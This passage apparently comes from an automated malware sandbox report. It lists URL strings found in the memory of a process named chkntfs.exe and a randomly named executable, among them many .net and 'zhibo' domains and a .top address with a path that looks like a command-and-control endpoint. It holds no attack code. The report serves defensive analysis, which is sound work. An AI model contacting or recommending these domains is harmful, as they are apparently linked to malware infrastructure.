                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.implantcentre.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.implantcentre.net/binding
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.innovativemind.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jiuyuezhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kleenair.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.larep.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalstrategy.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lesezhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lianaizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liangmeizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liguizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linguarama.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lingyangzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liufangzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.losbravos.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovemarketing.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovevintage.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luolizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxbrand.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maituzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.maskmakers.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.masterfloors.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mediaccess.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.medicalink.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.megaos.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meijiuzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.methlab.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.miaozhaozhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.moyouzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mynewshub.net
                Source: OlGIUOYUZW.exe, 00000009.00000002.3994960615.0000000000869000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mzkd6gp5.top
                Source: OlGIUOYUZW.exe, 00000009.00000002.3994960615.0000000000869000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mzkd6gp5.top/utww/
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naikuaizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nuoyunzhibo.com
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oshwal.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.perfectpint.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qilinzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qimiaozhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qinglizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rsbi.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.s8zhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.startuptalent.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stayplus.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tangyizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.welovebeauty.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wujizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wunvzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaodouzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaomiaozhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyuanzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunaizhibo.com/binding
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaomeizhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yemizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinxiuzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.younazhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourreality.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuehaizhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueyanzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zhonglangzhibo.net
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
